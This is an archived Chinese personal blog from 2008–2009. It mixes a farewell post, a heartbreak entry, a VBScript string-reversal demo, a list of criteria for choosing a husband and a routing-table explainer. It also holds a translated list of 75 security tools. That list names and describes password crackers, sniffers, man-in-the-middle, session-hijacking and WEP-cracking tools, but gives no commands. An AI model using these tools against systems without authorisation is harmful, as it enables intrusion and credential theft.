飘零的紫

退出sohu~blog了

飘零的紫 — Mon, 20 Apr 2009 20:14:58 +0800

以后不写blog 反正好长时间没写了

现在越来越垃圾了三天两头x

这次到好把友情连接彻底搞没了

没信心了`以后有时间买点空间自己做了`

---------------------------------------------------------消失

难受慢慢的会持续下去

飘零的紫 — Fri, 3 Apr 2009 01:03:31 +0800

我只是不想放弃我喜欢的人。而你说的结束了`虽然我的难受慢慢的会持续下去......

没想到自己在感情面前那么脆弱脆弱的象个彻头彻尾的小孩一样我知道我不可能忘记！自己痛苦的悲伤上多一份感情的痛苦

思念的气息依然伴随在难受的心情漂浮着`

``````或许我真的应该去学会接受现实不在躲避

lcx blog入口

飘零的紫 — Thu, 26 Mar 2009 23:53:53 +0800

无聊翻到的

没想到不让进去

定义和用法

StrReverse 函数可反转一个字符串。

语法

StrReverse(string)

参数描述

string

必需的。需被反转的字符串。

实例

例子 1

dim txt
txt="This is a beautiful day!"
document.write(StrReverse(txt))

输出：

!yad lufituaeb a si sihT

那么tpircsbvym/moc.udiab.ih//:ptth

反转就是 http://hi.baidu.com/myvbscript 嘿嘿实在很无聊

差距

飘零的紫 — Sun, 15 Mar 2009 16:10:01 +0800

差距````

而我把自己丢了

人生的十字路口而我的方向在那里

我的成长与成熟

飘零的紫 — Sat, 10 Jan 2009 15:30:50 +0800

标准一：有一份稳定的收入
爱情是很重要的，但是要建立在有面包的基础上。不一定要万贯家财，可生活要有保障。所谓贫贱夫妻百事哀，如果一个男人连孩子的奶粉钱都拿不出来，这个月初就开始担心下个月的供房款，那么，你跟着他只有吃苦的份了。
标准二：一个男人最重要的应该是坚强刚毅
那些失败过一次就怨天尤人，萎靡不振、跌倒了爬不起来的男人坚决不能要。男人要能给女人安全感，如果你找一个老公，不能够照顾你，还要经常在你面前哭诉自己的不幸，让你也承担他实际上是可以挽救的痛苦，是非常的失败的。
标准三：忠诚
这点就不用多说了，相信所有的女人都不愿意自己的老公红杏出墙。
标准四：有气度
一定不能找小家子气的男人，即使他爱你。但是因为一点点小事就吃醋，不论你是因公与上司出去应酬，还是因私与多年不久的朋友聚会，在你回家后大吵大闹或者阴沉着脸半天不搭理你的男人，其实是自私的。当然，他会说他那是因为爱你才吃醋，可是不要忘了，爱一个人也要给她自由，姐妹们千万不要做被男人用各种方法把你变相的留在家里做只能洗衣做饭的家庭主妇。不是说家庭主妇不好，而是做为现在这个社会的女性，要有自己的社交圈子，要独立、自强，不能给自己自由空间的男人千万不要找。
标准五：身体健康
不要求那个男的有多么的威猛高大，但一定要身体健健康康的。一个女人身体有点毛病，可以称之为弱不禁风，如果一个男人整天病怏怏的，你说像啥话?
标准六：不要妈妈的乖宝宝
没人说孝顺不对，孝顺的男人很善良，但是，夫妻之间的事都征求妈妈的看法，毫无自己主见，嘴巴里动不动就说：“妈妈说……妈妈说……”这样的妈妈面前的乖宝宝坚决不能要，记住，你嫁的是一个男人，并不是那个男人的母亲。
标准七：爱屋及乌
一个男人如果真的爱你，会爱你的一切，包括你的坏习惯，你的朋友，你的家人。如果他不能忍受你的朋友或家人某些方面的缺陷或对你身边的人有所不满，那么做为一个聪明的女性，应当尽量避免他与他们见面；如果他苛求到要求你与他们断绝来往，不用犹豫了，甩了他吧！
标准八：自信
浑身散发着自信味道的男人，能让女人放心的依靠。
标准九：外貌匹配
不要求他一定英俊潇洒，但要看上去不至于引起公愤，总不能你亭亭玉立一大美女，身边找一矮个的黑胖子吧。
标准十：细心又有情趣
他可以不记得你大伯小叔三姑四姨的生日，但你的生日与结婚纪念日一定要记住，这两个日子在婚姻生活中是很重要的。能够出去浪漫一下，还有礼物收是最好的。
标准十一：无不良嗜好
烟可以抽一点，酒可以喝一点，但不能太过。你总不想天天回去面对一个醉醺醺的酒鬼，嘴里还不时散发着一股浓浓的烟臭味的人吧？
标准十二：社交能力强
不是说一定要活跃得见人就笑，见手就握得那种地步，也不需要他在社交方面有一定强硬的手腕，但不能羞羞答答。
一起出去应酬，他只知道站在一旁傻笑，而找不到话题与你的同事交谈，凡事需要你出来撑场面的男人，会让你脸面无光。
标准十三：大男人气概
这里说的大男人气概，不是说大男子，那种在家里典型家务一点不做、衣来伸手饭来张口的男人不可取。大男人气概是指你在外面受到欺负时，他能够挺身而出，毫不犹豫的为你出头，真真切切的保护你。光是这一点，这个男人都值得你考虑托付终身。
标准十四：有责任心
男人一定要有责任心，自己做的事要敢于自己承担，无论是公事还是私事。那种一有事就往别人身上推的男人不但卑鄙而且可耻。
标准十五：有一颗平和的心
这个世界已经习惯以一个人事业上的成功来衡量一个人的价值。事实上，一个人的价值在于他的存在对别人是否重要。即使那个人不能在事业上取得与其他人一样辉煌的成就，但是他的平凡生活对他身边的人一样很重要就代表有价值。如果一个男人不能以一颗平和的心去看待自己的得失，整天愤世嫉俗，怪社会不公、怨生活不平，那么你和他在一起也会影响你的心态，容易偏激，给你的心理造成巨大的压力，导致你不快乐的生活。

75个最佳安全工具

飘零的紫 — Tue, 9 Sep 2008 00:51:06 +0800

因为是在nmap-hackers邮件列表中做出的评选，因此没有把nmap安全扫描器（http://www.insecure.org/nmap/）评选在内。这次评选出来的75个最佳安全工具在网络安全领域都是一些很有代表性的软件，对于那些在网络安全方面不知从何处开始的新手们来说，这对他们有相当的参考价值。

工具：Nessus（最好的开放源代码风险评估工具）
网址：http://www.nessus.org/
类别：开放源码
平台：Linux/BSD/Unix
简介：Nessus是一款可以运行在Linux、BSD、Solaris以及其他一些系统上的远程安全扫描软件。它是多线程、基于插入式的软件，拥有很好的GTK界面，能够完成超过1200项的远程安全检查，具有强大的报告输出能力，可以产生HTML、XML、LaTeX和ASCII文本等格式的安全报告，并且会为每一个发现的安全问题提出解决建议。

工具：Ethereal（网络协议检测工具）
网址：http://www.ethereal.com/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Ethereal是一款免费的网络协议分析程序，支持Unix、Windows。借助这个程序，你既可以直接从网络上抓取数据进行分析，也可以对由其他嗅探器抓取后保存在硬盘上的数据进行分析。你能交互式地浏览抓取到的数据包，查看每一个数据包的摘要和详细信息。Ethereal有多种强大的特征，如支持几乎所有的协议、丰富的过滤语言、易于查看TCP会话经重构后的数据流等。

工具：Snort（免费的入侵检测系统）
网址：http://www.snort.org/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Snort是一款轻量级的网络入侵检测系统，能够在IP网络上进行实时的流量分析和数据包记录。它不仅能进行协议分析、内容检索、内容匹配，而且能用于侦测诸如缓冲溢出、隐秘端口扫描、CGI攻击、SMB探测、操作系统指纹识别等大量的攻击或非法探测。Snort使用灵活的规则去描述哪些流量应该被收集或被忽略，并且提供一个模块化的探测引擎。

工具：Netcat（网络瑞士军刀）
网址：http://www.atstake.com/research/tools/network_utilities/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接，还有几个很有意思的内置功能。

工具：TCPDump/WinDump（用于网络监测和数据收集的优秀嗅探器）
网址：http://www.tcpdump.org/，http://windump.polito.it/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Tcpdump是一款众人皆知和受人喜欢的基于命令行的网络数据包分析和嗅探工具。它能把匹配规则的数据包的包头给显示出来。你能使用这个工具去查找网络问题或者去监视网络上的状况。WinDump是Tcpdump在Windows平台上的移植版。

工具：Hping2（类似ping的网络探测工具）
网址：http://www.hping.org/
类别：开放源码
平台：Linux/BSD/Unix
简介：hping2能发送自定义的ICMP/UDP/TCP包到目标地址并且显示包的响应情况。它有一个方便的traceroute模式，并且支持IP分片。这个工具在traceroute、ping和探测防火墙后的主机时特别有用。

工具：DSniff(一流的网络审计和渗透测试工具）
网址：http://naughty.m＆#111nkey.org/~dugsong/dsniff/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：DSniff是由Dug Song开发的一套包含多个工具的软件套件。其中，dsniff、filesnarf、mailsnarf、msgsnarf、rlsnarf和webspy可以用于监视网络上我们感兴趣的数据（如口令、e-mail、文件等），arpspoof、dnsspoof和macof能很容易地载取到攻击者通常难以获取的网络信息（如二层交换数据），sshmitm和webmitm则能用于实现重写SSH和HTTPS会话达到m＆#111nkey-in-the-middle攻击。在http://www.datanerds.net/~mike/dsniff.html可以找到Windows平台上的移植版。

工具：GFI LANguard（商业化的网络安全扫描软件）
网址：http://www.gfi.com/lannetscan/
类别：商业
平台：Windows
简介：LANguard扫描网络并且得出诸如每台机器的服务包等级、缺少的安全补丁、打开的共享、开放的端口、正在运行的服务和应用程序、注册表键值、弱口令、用户和组等扫描信息的报告。扫描结果输出为一个HTML格式的报告，报告能够自定义。

工具：Ettercap（为你的交换环境提供更多的安全）
网址：http://ettercap.sourceforge.net/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Ettercap是一款以太网环境下的网络监视、拦载和记录工具，支持多种主动或被动的协议分析（甚至跟加密相关的SSH、HTTPS等），有数据插入、过滤、保持连接同步等多种功能，也有一个能支持多种嗅探模式的、强大而完整的嗅探套件，支持插件，能够检查网络环境是否是交换局域网，并且能使用主动或被动的操作系统指纹识别技术让你了解当前局域网的情况。

工具：Whisker/Libwhisker（CGI缺陷扫描软件和库）
网址：http://www.wiretrip.net/rfp/p/doc.asp/d21.htm
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Whisker是一款非常好的HTTP服务器缺陷扫描软件，能扫描出大量的已知安全漏洞，特别是些危险的CGI漏洞。Libwhisker是一个用perl编写的由Whiskerr使用的程序库，通过它你可以创建自己HTTP扫描器。

工具：John the Ripper（格外强大、灵活、快速的多平台哈希口令破解器）
网址：http://www.openwall.com/john/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：John the Ripper是一个快速的口令破解器，支持多种操作系统，如Unix、DOS、Win32、BeOS和OpenVMS等。它设计的主要目的是用于检查Unix系统的弱口令，支持几乎所有Unix平台上经crypt函数加密后的口令哈希类型，也支持Kerberos AFS和Windows NT/2000/XP LM哈希等。

工具：OpenSSH/SSH（访问远程计算机的一种安全方法）
网址：http://www.openssh.com/，http://www.ssh.com/commerce/index.html
类别：开放源码/商业
平台：Linux/BSD/Unix/Windows
简介：SSH（Secure Shell）是一款用来登录远程服务器并在远程服务器上执行命令的程序，在缺少安全防护的网络上它能给两台互不信任的主机间提供安全可靠的加密通讯。X11连接和其他任意的TCP/IP端口连接都可以通过SSH进行数据封装转发到一个安全的通道里。SSH开发的本意是用于代替rlogin、rsh和rcp这些不安全的程序，以及为rdist和rsync提供安全通道。需要注意的是，OpenSSH是SSH的替代软件，SSH对于某些用途是要收费的，但OpenSSH总是免费。

工具：Sam Spade（Windows平台上的免费网络查询工具）
网址：http://www.samspade.org/ssw/
类别：免费软件
平台：Windows
简介：SamSpade提供了一个友好的GUI界面，能方便地完成多种网络查询任务，它开发的本意是用于追查极品邮件制造者，但也能用于其它大量的网络探测、网络管理和与安全有关的任务，包括ping、nslookup、whois、dig、traceroute、finger、raw HTTP web browser、DNS zone transfer、SMTP relay check、website search等工具，在它的网站还有大多数查询工具的一个在线版本（http://www.samspade.org/t/）。

工具：ISS Internet Scanner（应用层风险评估工具）
网址：http://www.iss.net/products_services/enterprise_protection
/vulnerability_assessment/scanner_internet.php
类别：商业
平台：Windows
简介：互联网扫描器（Internet Scanner）始于1992年一个小小的开放源代码扫描器，它是相当不错的，但价格昂贵，使用开源软件Nessus来代替它也是一个不错的选择。

工具：Tripwire（功能强大的数据完整性检查工具）
网址：http://www.tripwire.com/
类别：商业
平台：Linux/BSD/Unix/Windows
简介：Tripwire是一款文件和目录完整性检查工具，它能帮助系统管理员和用户监视一些重要文件和目录发生的任何变化。通过制定一些基本的系统策略，在文件遭到破坏或篡改时由Tripwire通知系统管理员，从而能及时地做出处理。Tripwire的商业版本非常昂贵，在Tripwire.Org网站有一个免费的开放源代码的Linux版本，UNIX用户也可能需要考虑AIDE（http://www.cs.tut.fi/~rammer/aide.html），它是Tripwire的免费替代品。

工具：Nikto（一款非常全面的web扫描器）
网址：http://www.cirt.net/code/nikto.shtml
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Nikto是一款能对web服务器多种安全项目进行测试的扫描软件，能在200多种服务器上扫描出2000多种有潜在危险的文件、CGI及其他问题。它也使用LibWhiske库，但通常比Whisker更新的更为频繁。

工具：Kismet（强大的无线嗅探器）
网址：http://www.kismetwireless.net/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Kismet是一款802.11b网络嗅探和分析程序，功能有：支持大多数无线网卡，能通过UDP、ARP、DHCP数据包自动实现网络IP阻塞检测，能通过Cisco Discovery协议列出Cisco设备，弱加密数据包记录，和Ethereal、tcpdump兼容的数据包dump文件，绘制探测到的网络图和估计网络范围。

工具：SuperScan（Windows平台上的TCP端口扫描器）
网址：http://www.foundstone.com/index.htm?subnav=resources/
navigation.htm&subcontent=/resources/proddesc/superscan.htm
类别：免费
平台：Windows
简介：SuperScan是一款具有TCP connect端口扫描、Ping和域名解析等功能的工具，能较容易地做到对指定范围内的IP地址进行ping和端口扫描。源代码不公开。

工具：L0phtCrack 4（Windows口令审计和恢复程序）
网址：http://www.atstake.com/research/lc/
类别：商业
平台：Linux/BSD/Unix/Windows
简介：L0phtCrack试图根据从独立的Windows NT/2000工作站、网络服务器、主域控制器或Active Directory上正当获取或者从线路上嗅探到的加密哈希值里破解出Windows口令，含有词典攻击、组合攻击、强行攻击等多种口令猜解方法。

工具：Retina（eEye公司的风险评估扫描工具）
网址：http://www.eeye.com/html/Products/Retina/index.html
类别：商业
平台：Windows
简介：像上面提到的Nessus和ISS Internet Scanner一样，Retina的功能也是用于扫描网络内所有的主机并且报告发现的每一个缺陷。

工具：Netfilter（当前Linux内核采用的包过滤防火墙）
网址：http://www.netfilter.org/
类别：开放源码
平台：Linux
简介：Netfilter是一款功能强大的包过滤防火墙，在标准的Linux内核内得到实现，iptables是防火墙配置工具。它现在支持有状态或无状态检测的包过滤，支持所有种类的NAT和包分片。相应的，对于非Linux平台上的防火墙，OpenBSD平台上有pf，UNIX平台上有ipfilter，Windows平台上有Zone Alarm个人防火墙。

工具：traceroute/ping/telnet/whois（基本命令）
网址：
类别：免费
平台：Linux/BSD/Unix/Windows
简介：当我们使用大量的高水平的工具来辅助安全审计工作时，别忘了这几个最基本的工具。我们每个人都应非常熟悉这几个工具的用法，几乎所有的操作系统上都附带有这几个工具，不过Windows平台上没有whois工具，并且traceroute改名为tracert。

工具：Fport（增强的netstat）
网址：http://www.foundstone.com/index.htm?subnav=resources/
navigation.htm&subcontent=/resources/proddesc/fport.htm
类别：免费
平台：Windows
简介：Fport能显示主机上当前所有打开的TCP/IP、UDP端口和端口所属的进程，因此通过使用它能即刻发现未知的开放端口和该端口所属的应用程序，是一款查找木马的好工具。不过，Fport仅支持Windows系统，在许多UNIX系统上有一个netstat命令实现类似功能，Linux系统上用"netstat -pan"命令。源代码不公开。

工具：SAINT（安全管理员的综合网络工具）
网址：http://www.saintcorporation.com/saint/
类别：商业
平台：Linux/BSD/Unix
简介：Saint是一款商业化的风险评估工具，但与那些仅支持Windows平台的工具不同，SAINT运行在UNIX类平台上，过去它是免费并且开放源代码的，但现在是一个商业化的产品。

工具：Network Stumbler（免费的Windows平台802.11嗅探器）
网址：http://www.stumbler.net/
类别：免费
平台：Windows
简介：Netstumbler是最有名的寻找无线接入点的工具，另一个支持PDA的WinCE平台版本叫Ministumbler。这个工具现在是免费的，仅仅支持Windows系统，并且源代码不公开，而且该软件的开发者还保留在适当的情况下对授权协议的修改权。UNIX系统上的用户可以使用Kismet来代替。

工具：SARA（安全管理员的辅助工具）
网址：http://www-arc.com/sara/
类别：开放源码
平台：Linux/BSD/Unix
简介：SARA是一款基于SATAN安全扫描工具开发而来的风险评估工具，每月更新两次。

工具：N-Stealth（web服务器扫描工具）
网址：http://www.nstalker.com/nstealth/
类别：商业
平台：Windows
简介：N-Stealth是一款商业化的Web服务器安全扫描软件，通常它比whisker、nikto等免费的web扫描器升级的更为频繁。N-Stealth开发商宣称的"超过20,000条的缺陷和exploit数据"和"每天新增大量的缺陷检查"是非常可疑的。我们也要注意到，在nessus、ISS、Retina、SAINT和SARA等所有常见的风险评估工具里已含有web扫描组件，不过它们可能没有N-Stealth这样灵活易用和更新频繁。n-stealth不公开源代码。

工具：AirSnort（802.11 WEP密码破解工具）
网址：http://airsnort.shmoo.com/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：AirSnort是一款无线局域网密钥恢复工具，由Shmoo小组开发。它监视无线网络中的传输数据，当收集到足够多的数据包时就能计算出密钥。

工具：NBTScan（从Windows网络上收集NetBIOS信息）
网址：http://www.inetcat.org/software/nbtscan.html
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：NBTscan是一个用于扫描网络上NetBIOS名字信息的程序。这个程序对给出范围内的每一个地址发送NetBIOS状态查询，并且以易读的表格列出接收到的信息，对于每个响应的主机，它列出它的IP地址、NetBIOS计算机名、登录用户名和MAC地址。

工具：GnuPG/PGP（保护你的文件和通信数据的先进加密程序）
网址：http://www.gnupg.org/，http://www.pgp.com/
类别：开放源码/商业
平台：Linux/BSD/Unix/Windows
简介：PGP是由Phil Zimmerman开发的著名加密程序，它使用公钥加密算法和常规的加密技术相结合，能将加密后的文件安全地从一地传递到另一地，从而保护用户的数据免于窃听或其他的安全风险。GnuPG是遵照PGP标准开发的开源程序，不同的是，GnuPG是永远免费的，而PGP对于某些用途要收费。

工具：Firewalk（高级的traceroute）
网址：http://www.packetfactory.net/projects/firewalk/
类别：开放源码
平台：Linux/BSD/Unix
简介：Firewalk使用类似traceroute的技术来分析IP包的响应，从而测定网关的访问控制列表和绘制网络图。2002年10月，这个一流的工具在原来的基础上进行了重新开发。需要注意到的是，Firewalk里面的大多数功能也能由Hping2的traceroute选项来实现。

工具：Cain & Abel（穷人的L0phtcrack）
网址：http://www.oxid.it/cain.html
类别：免费
平台：Windows
简介：Cain & Abel是一个针对Microsoft操作系统的免费口令恢复工具。它通过如下多种方式轻松地实现口令恢复：网络嗅探、破解加密口令（使用字典或强行攻击）、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议等。源代码不公开。

工具：XProbe2（主动操作系统指纹识别工具）
网址：http://www.sys-security.com/html/projects/X.html
类别：开放源码
平台：Linux/BSD/Unix
简介：XProbe是一款测定远程主机操作系统类型的工具。它依靠与一个签名数据库的模糊匹配以及合理的推测来确定远程操作系统的类型，利用ICMP协议进行操作系统指纹识别是它的独到之处。

工具：SolarWinds Toolsets（大量的网络发现、监视、攻击工具）
网址：http://www.solarwinds.net/
类别：商业
平台：Windows
简介：SolarWinds包含大量适合系统管理员做特殊用途的工具，与安全相关的工具包括许多的网络发现扫描器（network discovery scanner）和一个SNMP强力破解器。

工具：NGrep（方便的包匹配和显示工具）
网址：http://www.packetfactory.net/projects/ngrep/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：NGrep在网络层实现了GNU grep的大多数功能，基于pcap，可以使你通过指定扩展的正则表达式或十六进制表达式去匹配网络上的数据流量。它当前能够识别流经以太网、PPP、SLIP、FDDI、令牌网和回环设备上的TCP、UDP和ICMP数据包，并且和其他常见的嗅探工具（如tcpdump和snoop）一样，理解bpf过滤机制。

工具：Perl/Python（脚本语言）
网址：http://www.perl.org，http://www.python.org/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：当我们使用那些已经开发好的安全工具来处理任务时，别忘了能自己写出（或修改）安全程序也是一件非常重要的事情。利用Perl和Python能非常容易地写出用于系统测试、exploit和修补的脚本程序，使用包含Net::RawIP和协议实现等模块的CPAN（Comprehensive Perl Archive Network：http://www.cpan.org/）或类似的档案能帮助我们比较容易地进行相关的开发。

工具：THC-Amap（应用程序指纹识别扫描器）
网址：http://www.thc.org/releases.php
类别：开放源码
平台：Linux/BSD/Unix
简介：由THC开发的Amap是一个功能强大的扫描器，它通过探测端口响应的应用程序指纹数据来识别应用程序和服务，远甚于通过缺省端口号来判断应用程序和服务的方法。

工具：OpenSSL（最为重要的SSL/TLS加密库）
网址：http://www.openssl.org/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：OpenSSL项目是共同努力开发出来的一个健全的、商业级的、全开放的和开放源代码的工具包，用于实现安全套接层协议(SSL v2/v3)和传输层安全协议(TLS v1)以及形成一个功效完整的通用加密库。该项目由全世界范围内志愿者组成的团体一起管理，他们使用Internet去交流、设计和开发这个OpenSSL工具和相关的文档。

工具：NTop（网络使用状况监测软件）
网址：http://www.ntop.org/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Ntop是一款显示网络使用状况的流量监测软件，类似于UNIX平台上监视系统进程的top命令。在交互模式下，ntop会将网络的使用状况显示在用户的终端上；在Web模式下，ntop会做为一个web服务器，创建包含网络状况的HTML网页返回给用户。

工具：Nemesis（命令行式的UNIX网络信息包插入套件）
网址：http://www.packetfactory.net/projects/nemesis/
类别：开放源码
平台：Linux/BSD/Unix
简介：Nemesis项目是为了开发一个UNIX/Linux系统上基于命令行的、方便人们使用的IP栈，它可以自定义数据包、插入数据包、进行协议攻击等，是一个很好的测试防火墙、入侵检测系统、路由器和其他网络设备的工具。如果你对Nemesis感兴趣，那么你也可能需要看看hping2，这两者补相互之不足。

工具：LSOF（列出打开的文件）
网址：ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/
类别：开放源码
平台：Linux/BSD/Unix
简介：LSOF是针对Unix的诊断和分析工具，它能显示出由系统里正在运行的进程所打开的文件，也能显示出每一个进程的通讯socket。

工具：Hunt（Linux平台上高级的包嗅探和会话劫持工具）
网址：http://lin.fsid.cvut.cz/~kra/index.html#HUNT
类别：开放源码
平台：Linux
简介：Hunt能监视、劫持、重设网络上的TCP连接，在以太网上使用才有作用，并且含有监视交换连接的主动机制，以及包括可选的ARP转播和劫持成功后的连接同步等高级特征。

工具：Honeyd（你个人的honeynet，http://www.honeynet.org/）
网址：http://www.citi.umich.edu/u/provos/honeyd/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Honeyd是一个能在网络上创建虚拟主机的小小后台程序，虚拟主机能被配置成运行任意的服务，并且洽当的服务TCP特性以致他们看起来就像是运行在某个特定版本的操作系统上。Honeyd能在一个模拟的局域网环境里让一台主机配有多个地址，并且可以对虚似主机进行ping、traceroute。虚拟主机上任何类型的服务都可以依照一个简单的配置文件进行模拟。Honeyd也可以对一台主机做代理服务，而不是模拟它。

工具：Achilles（可以修改http会话包的代理程序）
网址：http://packetstormsecurity.nl/filedesc/achilles-0-27.zip.html
类别：开放源码
平台：Windows
简介：Achilles是一个设计用来测试web应用程序安全性的工具。它是一个代理服务器，在一个HTTP会话中扮演着"中间人"（man-in-the-middle）的角色。一个典型的HTTP代理服务器将在客户浏览器和web服务器间转发数据包，但Achilles却载取发向任一方的HTTP会话数据，并且在转发数据前可以让用户修改这些数据。

工具：Brutus（网络认证的强行破解工具）
网址：http://www.hoobie.net/brutus/
类别：免费
平台：Windows
简介：Brutus是一款对远程服务器的网络服务进行口令猜解的工具，支持字典攻击和组合攻击，支持的网络应用包括HTTP、POP3、FTP、SMB、TELNET、IMAP、NTP等。源代码不公开。UNIX系统上的THC-Hydra有类似的功能。

工具：Stunnel（一个多种用途的SSL加密外壳）
网址：http://www.stunnel.org/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Stunnel程序被设计用来做为本地客户端和远程服务器间的SSL加密外壳。它能在POP2、POP3、IMAP等使用inetd后台进程的服务器上增加SSL功能，并且不会影响到程序源代码。它使用OpenSSL或SSLeay库建立SSL会话连接。

工具：Paketto Keiretsu（极端的TCP/IP）
网址：http://www.doxpara.com/paketto
类别：开放源码
平台：Linux/BSD/Unix
简介：Paketto Keiretsu是一组使用新式的不常见的策略去操作TCP/IP网络的工具集合，开发的最初本意是为了在现有TCP/IP架构里去实现一些功能，但现在已经远远超出了最初的本意。包含的工具有：Scanrand，一个罕见的快速的网络服务和拓朴发现系统；Minewt，一个NAT/MAT路由器；linkcat，把以太网链路做为标准的输入输出；Paratrace，不产生新的连接就能追踪网络路径；Phentropy，使用OpenQVIS在三维拓朴空间里能绘制出任意总量的数据源图形。
　

工具：Fragroute（破坏入侵检测系统最强大的工具）
网址：http://www.m＆#111nkey.org/~dugsong/fragroute/
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Fragroute能够截取、修改和重写向外发送的报文，实现了大部分的IDS攻击功能。Fragroute起重要作用的是一个简单的规则设置语言，以它去实现延迟、复制、丢弃、碎片、重叠、打印、重排、分割、源路由或其他一些向目标主机发送数据包的攻击。这个工具开发的本意是去测试入侵检测系统、防火墙、基本的TCP/IP栈的行为。像Dsniff、Libdnet一样，这个优秀的工具也是由Dug Song开发的。

工具：SPIKE Proxy
网址：http://www.immunitysec.com/spikeproxy.html
类别：开放源码
平台：Linux/BSD/Unix/Windows
简介：Spike Proxy是一个开放源代码的HTTP代理程序，用于发现web站点的安全缺陷。它是Spike应用程序测试套件（http://www.immunitysec.com/spike.html）的一部份，支持SQL插入检测、web站点检测、登录表单暴力破解、溢出检测和字典穷举攻击检测等。

工具：THC-Hydra（网络认证的破解工具）
网址：http://www.thc.org/releases.php
类别：开放源码
平台：Linux/BSD/Unix
简介：这个工具能对需要网络登录的系统进行快速的字典攻击，包括FTP、POP3、IMAP、Netbios、Telnet、HTTP Auth、LDAP NNTP、VNC、ICQ、Socks5、PCNFS等，支持SSL，并且现在是Nessus风险评估工具的一部份。

其他的25个最佳安全工具：

OpenBSD，http://www.openbsd.org/ :安全可靠的操作系统。

TCP Wrappers，ftp://ftp.porcupine.org/pub/security/index.html :一流的IP访问控制和日志的实现机制。

pwdump3，http://www.polivec.com/pwdump3.html :获取本地或远程Windows主机的口令哈希，而不管是否安装了syskey。

LibNet，http://www.packetfactory.net/libnet/ :允许程序员去构造和插入网络数据包的高水平开发函数库.

IpTraf，http://cebu.mozcom.com/riker/iptraf/ :IP网络监控软件。

Fping，http://www.fping.com/ :一次可以ping多个IP地址的扫描程序。

Bastille，http://www.bastille-linux.org/ :增强系统安全性的脚本程序，支持Linux, Mac OS X和HP-UX操作系统。

Winfingerprint，http://winfingerprint.sourceforge.net/ :一款基于Win32的高级远程系统扫描器。

TCPTraceroute，http://michael.toren.net/code/tcptraceroute/ :使用TCP SYN包实现traceroute的工具。

Shadow Security Scanner，http://www.safety-lab.com/en2/products/1.htm :一款商业化的风险评估工具。

pf，http://www.benzedrine.cx/pf.html :OpenBSD系统内很有特色的包过滤防火墙。

LIDS，http://www.lids.org/ inux内核上的入侵检测和入侵防御系统。

hfnetchk，http://www.microsoft.com/technet/treeview/default.asp?
url=/technet/security/tools/tools/hfnetchk.asp :微软发布的用于检查网络上Windows主机补丁安装情况的工具。

etherape，http://etherape.sourceforge.net/ :继流量监测软件etherman之后又一个支持unix的图形化网络状况监测软件。

dig，http://www.isc.org/products/BIND/ :Bind附带的DNS查询工具。

Crack/Cracklib，http://www.users.dircon.co.uk/~crypto/ :一流的本地口令破解器。

cheops/cheops-ng，http://www.marko.net/cheops/，http://cheops-ng.sourceforge.net/ :绘制本地或远程网络的网络图，并且也能识别主机的操作系统类型。

zone alarm，http://www.zonelabs.com/ :Windows平台上的个人防火墙软件。

Visual Route，http://www.visualware.com/visualroute/index.html :获取traceroute/whois数据，并且绘制出数据包经过的网络路线在世界地图上的位置。

The Coroner's Toolkit (TCT)，http://www.fish.com/tct/ :运行于Unix系统上的文件系统检查及紧急修复工具集。

tcpreplay，http://tcpreplay.sourceforge.net/ :能把tcpdump或snoop保存下来的流量监测文件在任意点进行回放的工具。

snoop，http://www.spitzner.net/snoop.html :Solaris系统附带的网络嗅探工具。

putty，http://www.chiark.greenend.org.uk/~sgtatham/putty/ :Windows平台上优秀的SSH客户端。

pstools，http://www.sysinternals.com/ntw2k/freeware/pstools.shtml :一套用于管理Windows系统的免费命令行工具。

arpwatch，http://www-nrg.ee.lbl.gov/ :主要用来检测mac地址和ip地址对应关系的工具。

如何读懂路由表

飘零的紫 — Tue, 9 Sep 2008 00:43:40 +0800

Network Destination Netmask Gateway Interface Metric

0.0.0.0 0.0.0.0 192.168.123.254 192.168.123.88 1

0.0.0.0 0.0.0.0 192.168.123.254 192.168.123.68 1

127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1

192.168.123.0 255.255.255.0 192.168.123.68 192.168.123.68 1

192.168.123.0 255.255.255.0 192.168.123.88 192.168.123.88 1 6 Z

192.168.123.68 255.255.255.255 127.0.0.1 127.0.0.1 1

192.168.123.88 255.255.255.255 127.0.0.1 127.0.0.1 1

192.168.123.255 255.255.255.255 192.168.123.68 192.168.123.68 1

192.168.123.255 255.255.255.255 192.168.123.88 192.168.123.88 1

224.0.0.0 224.0.0.0 192.168.123.68 192.168.123.68 1

224.0.0.0 224.0.0.0 192.168.123.88 192.168.123.88 1

255.255.255.255 255.255.255.255 192.168.123.68 192.168.123.68 1

Default Gateway: 192.168.123.254
====================================================
当前的路由：
destination 目的网段

mask 子网掩码

interface 到达该目的地的本路由器的出口ip

gateway 下一跳路由器入口的ip，路由器通过interface和gateway定义一调到下一个路由器的链路，通常情况下，interface和gateway是同一网段的

metric 跳数，该条路由记录的质量，一般情况下，如果有多条到达相同目的地的路由记录，路由器会采用metric值小的那条路由

第一条
缺省路由：意思就是说，当一个数据包的目的网段不在你的路由记录中，那么，你的路由器该把那个数据包发送到哪里！缺省路由的网关是由你的连接上的default gateway决定的

